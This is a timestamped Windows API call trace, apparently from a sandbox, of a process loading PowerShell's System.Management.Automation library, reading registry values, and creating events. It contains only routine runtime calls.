	[0231.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.172] VirtualQuery (in: lpAddress=0x29bc00, lpBuffer=0x29cac0, dwLength=0x30 | out: lpBuffer=0x29cac0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0245.176] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0245.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.177] CoTaskMemFree (pv=0x46eac0) 
	[0245.184] VirtualQuery (in: lpAddress=0x29bc00, lpBuffer=0x29cac0, dwLength=0x30 | out: lpBuffer=0x29cac0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0245.527] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0245.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.527] CoTaskMemFree (pv=0x46eac0) 
	[0245.531] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0245.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.531] CoTaskMemFree (pv=0x46eac0) 
	[0245.533] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0245.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.533] CoTaskMemFree (pv=0x46eac0) 
	[0245.540] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0245.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.540] CoTaskMemFree (pv=0x46eac0) 
	[0245.545] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0245.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.545] CoTaskMemFree (pv=0x46eac0) 
	[0245.554] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0245.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.554] CoTaskMemFree (pv=0x46eac0) 
	[0245.559] VirtualQuery (in: lpAddress=0x29bc00, lpBuffer=0x29cac0, dwLength=0x30 | out: lpBuffer=0x29cac0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0245.891] VirtualQuery (in: lpAddress=0x29bc00, lpBuffer=0x29cac0, dwLength=0x30 | out: lpBuffer=0x29cac0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.926] VirtualQuery (in: lpAddress=0x29bc00, lpBuffer=0x29cac0, dwLength=0x30 | out: lpBuffer=0x29cac0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.365] CoTaskMemFree (pv=0x46eac0) 
	[0252.148] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x46ebd0
	[0258.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.480] CoTaskMemFree (pv=0x46edf0) 
	[0258.935] CoTaskMemAlloc (cb=0x104) returned 0x46edf0
	[0258.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.935] CoTaskMemFree (pv=0x46edf0) 
	[0258.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.751] VirtualQuery (in: lpAddress=0x29beb0, lpBuffer=0x29cd70, dwLength=0x30 | out: lpBuffer=0x29cd70*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0264.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.765] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29dc8c, lpData=0x0, lpcbData=0x29dc88*=0x0 | out: lpType=0x29dc8c*=0x1, lpData=0x0, lpcbData=0x29dc88*=0x56) returned 0x0
	[0264.765] CoTaskMemAlloc (cb=0x5a) returned 0x1b763e70
	[0264.765] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29dc5c, lpData=0x1b763e70, lpcbData=0x29dc58*=0x56 | out: lpType=0x29dc5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29dc58*=0x56) returned 0x0
	[0264.765] CoTaskMemFree (pv=0x1b763e70) 
	[0264.765] RegCloseKey (hKey=0x32c) returned 0x0
	[0264.766] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29dc8c, lpData=0x0, lpcbData=0x29dc88*=0x0 | out: lpType=0x29dc8c*=0x1, lpData=0x0, lpcbData=0x29dc88*=0x56) returned 0x0
	[0264.766] CoTaskMemAlloc (cb=0x5a) returned 0x1b763e70
	[0264.766] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29dc5c, lpData=0x1b763e70, lpcbData=0x29dc58*=0x56 | out: lpType=0x29dc5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29dc58*=0x56) returned 0x0
	[0264.766] CoTaskMemFree (pv=0x1b763e70) 
	[0264.767] RegCloseKey (hKey=0x32c) returned 0x0
	[0264.768] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x45d9b0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0264.768] CoTaskMemFree (pv=0x45d9b0) 
	[0264.768] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0264.769] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x45d9b0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0264.769] CoTaskMemFree (pv=0x45d9b0) 
	[0264.769] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0264.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.776] CoTaskMemFree (pv=0x46edf0) 
	[0264.778] CoTaskMemAlloc (cb=0x104) returned 0x46edf0
	[0264.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.778] CoTaskMemFree (pv=0x46edf0) 
	[0265.313] CoTaskMemAlloc (cb=0x104) returned 0x46edf0
	[0265.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.314] CoTaskMemFree (pv=0x46edf0) 
	[0265.317] CoTaskMemAlloc (cb=0x104) returned 0x46edf0
	[0265.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.317] CoTaskMemFree (pv=0x46edf0) 
	[0265.323] CoTaskMemAlloc (cb=0x104) returned 0x46edf0
	[0265.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.323] CoTaskMemFree (pv=0x46edf0) 
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x364
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x31c
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
